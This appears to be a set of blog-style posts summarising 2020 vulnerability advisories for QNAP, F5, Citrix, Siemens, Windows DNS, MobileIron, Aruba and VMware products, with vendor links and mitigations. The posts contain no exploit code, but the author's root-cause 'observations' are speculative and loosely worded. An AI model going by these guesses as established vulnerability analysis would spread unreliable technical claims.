Preface: Do a simple search in Shodan and you will find many QNAPs on the Internet.

Installation status of NAS(QNAP) around the world: We are not surprised that NAS (QNAP) equipment has a huge customer footprint. Because the price is reasonable (RAID-5), it is cost-effective. As a result, business operations including medium-sized enterprises are willing to use it. Maybe the IT team knows about patch management, so NAS (QNAP) devices will connect to the Internet.

Vulnerability details: All QNAP NAS devices are potentially vulnerable to QSnatch malware if not updated with the latest security fixes.

Important Note: Not exposing your NAS to the internet isn’t going to stop an attack on your write permission SMB shares on your client machine that are attacked. The only solution is to disconnect all your mapped drives once you are finished using them. Or do the patch management.

CISA and NCSC also share the following mitigations to prevent future attacks:
• Verify that you purchased QNAP devices from reputable sources. If sources are in question, run a full factory reset on the device prior to completing the firmware upgrade.
• Block external connections when the device is intended to be used strictly for internal storage.

Preface: As of today, F5 BIG-IP Platform has market share 72%.

Background: The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has published on 24th July, 2020. They urge to F5 customers that it should be stay alert. They has evidence proof that attackers are active exploit the vulnerability (CVE-2020-5902 – unauthenticated remote code execution (RCE) vulnerability) on F5 product ADC feature).

Vulnerability detail: With reference to the attached picture, security experts pointed out that attackers can use the HTTP/HTTPS transport protocol to attack. Key flaws include allowing attackers to infiltrate and execute code remotely. In addition, an attacker can also read credential storage or files on the F5 operating system.

CISA alert: CISA recommends all organizations to go through the following action list while hunting for exploitation signs:

• Quarantine or take offline potentially affected systems
• Collect and review artifacts such as running processes/services, unusual authentications, and recent network connections
• Deploy a CISA-created Snort signature to detect malicious activity (available in the alert under Detection Methods)

F5 network remedy plan – https://support.f5.com/csp/article/K52145254

Corrective control suggested by vendor – To mitigate this vulnerability for affected F5 products, you should permit management access to F5 products only over a secure network.

Preface: Input validation will be difficult if the environment contains different features. Even though software developer follow the guideline. Because it use http or https connection design , so it increase the difficulties!

Background: Citrix Workspace app consists of the Citrix Receiver core, HDX engine, the new embedded browser engine, files view and mobile app aggregation.
By default, Citrix Workspace Updates is disabled on the VDA. This includes RDS multi-user server machines, VDI and Remote PC Access machines.

Vulnerability details: Improper access control in Citrix Workspace app for Windows 1912 CU1 and 2006.1 causes privilege escalation and code execution when the automatic updater service is running. Official details are shown below the URL:

https://support.citrix.com/article/CTX277662

Observation: One of the possible methods – refer below connection method. If suspicious workstation installed Citrix workspace application. Attacker can use https or http connection to exploit SMB design weakness to compromise the Active Directory system. The concept can be found on attached diagram.
Remark: There is a design weakness happened on Citrix workspace application. Seems the input validation requires improvement.

Preface: In industries, power plants and substations, the SICAM MMU
is applied to measure and calculate parameters.

Product background: SICAM T (transducer) is a digital measuring sensor that allows the measurement of electricity in non-electrical networks in a single unit. ICAM-MMU (Measurement and Monitoring Unit) is a power monitoring device that allows the measurement of electricity in the power grid.

Remark: SICAM SGU has been discontinued.

Security Focus: CVE-2020-10042 – A buffer overflow in various positions of the web application might enable an attacker with access to the web application to execute arbitrary code over the network.

My observation:

Fundamental theory: For custom application software, all code that accepts input from users via the HTTP request must be reviewed to ensure that it can properly handle arbitrarily large input.

A buffer overflow in various positions of the web application might enable an attacker with access to the web application to execute arbitrary code over the network.

Possibility: According to the definition of CWE-120. Buffer overflow related to this vulnerability will be caused by looping correction. The function does not work after JavaScript updates the Field (Update fields dynamically in javascript).

Synopsis: By sending carefully crafted input to an application, an attacker can cause the application to execute arbitrary code, possibly taking over the machine.

Official announcement: https://cert-portal.siemens.com/productcert/pdf/ssa-305120.pdf

Preface: Perhaps we ignore DNS server side design weakness so far. It is on the way impacting cyber security world.

Background: DNS is a hierarchical client-server protocol. Each domain is served by one or more DNS servers, meaning requests for subdomains are sent to these servers. Replies can also be cached by intermediate servers in order to improve performance.

(CVE-2020-1350) Vulnerability detail: A remote code execution vulnerability exists in Windows Domain Name System servers when they fail to properly handle requests.

Official detail – https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1350

Observation: The RDLENGTH bounds-check design weakness may relate to trigger this flaw. If pointer overflows wrap around (undefined behaviour) this would allow an attacker to circumvent the bounds-check and exposes a buffer overflow vulnerability since the attacker controlled addrlen is later used in memcpy(addr_out, bufpos, addrlen), potentially allowing a code execution.

Preface: Mobile has 50.13%, Desktop has 47.06% – June 2019 – June 2020

Background: MobileIron helps you simplify the configuration of enterprise settings including email, Wi-Fi, and VPN and more. Meanwhile, MobileIron provides unified endpoint and enterprise mobility management (EMM) for mobile devices.

Vulnerabilities details: Please refer to url https://www.mobileiron.com/en/blog/mobileiron-security-updates-available

Comment: The official announcement did not provide a reason for the vulnerability. We can use assumption to understand the popular cyber attack techniques. Apart from scenario displayed on attached diagram. The attacker can exploit malware to do the attack. For instance, attacker can implant malware to the endpoint by phishing attack. It can read the plaintext derived credentials from the flash storage after the software token has been activated, and transmit them to the adversary responsible for the malware, who can then use them at will on a different machine.

Preface: WiFi features from beginning phase a small group of access extended to enterprises infrastructure nowadays. Even the IoT 4.0 and Industrial system especially ICS and IACS system will be found his footprint.

Background: Aruba’s ClearPass Policy Manager, part of the Aruba 360 Secure Fabric, provides role- and device-based secure network access control for IoT, BYOD, corporate devices, as well as employees, contractors and guests across any multivendor wired, wireless and VPN infrastructure.

About the subject: The official announcement has been released on 2nd June 2020 – https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2020-005.txt

However the details of PoC just released 2 days ago. The PoC shown that it require using the C preprocessor generic programming interface defined in unistd[.]h. In additional it require to use compiler and conduct the re-engineering for payload library.
But the most important thing is that to successfully utilize the PoC code, user authentication is required. However, if the system administrator has not patched CVE-2018-7076 in the past. It will provide benefits for attackers. Easily exploit vulnerabilities discovered in June 2020.

Preface: Typically, North-South traffic is load balanced by Ingress devices such as Citrix ADCs while East-West traffic is load balanced by kube-proxy. Since kube-proxy only provides limited layer-4 load balancing, service owners can utilize the Citrix ingress controller to achieve sophisticated layer-7 controls for East-West traffic using the Ingress CPX ADCs.

Security Focus: With reference with Citrix technical article (Security Bulletin CTX276688). There are total of 11 vulnerabilities. Because of CVE-2020-8191 (Reflected Cross Site Scripting (XSS)). And therefore it provides a way for attacker utilize XSS vulnerability to steal the session cookie. This design weakness is similar to responding to other vulnerabilities that require user credentials.

Background: The NSIP address is the IP address at which you access the Citrix ADC appliance for management purposes. The appliance can have only one NSIP, which is also called the management IP address. You must add this IP address when you configure the Citrix ADC for the first time. You cannot remove an NSIP address.

Vulnerability detail: Citrix ADC and Citrix Gateway could allow a remote authenticated attacker to gain elevated privileges on the system, caused by an unspecified flaw. By sending a specially-crafted request, an authenticated attacker could exploit this vulnerability to gain elevated privilege. Utilize XSS vulnerability to steal the session cookie.

Official announcement – https://support.citrix.com/article/CTX276688

Background: The VMware SD-WAN Orchestrator provides centralized enterprise-wide installation, configuration and real-time monitoring in addition to orchestrating the data flow through the cloud network.

Technical highlight – The VeloCloud Orchestrator (VCO) stores only flow statistics with high resolution to provide visibility and troubleshooting capability.
By default, a maximum of one million flows are rolled up per edge per day. This averages out to approximately 3500 flows per 5-minute push.

Vulnerability details: In 3.3.0 release, the VeloCloud Orchestrator (VCO) stores only flow statistics with high resolution to provide visibility and troubleshooting capability. In 3.3.2 release, VCO supports retention of flow stats for upto one year by rolling up flow stats for every edge on a daily basis. So, the VeloCloud Orchestrator requires connect to MySQL server. Meanwhile it has design weakness. The original design does not apply correct input validation which allows for blind SQL-injection.

Impact: A crafted SQL queries and obtain data to which they are not privileged.

Official announcement – https://www.vmware.com/security/advisories/VMSA-2020-0016.html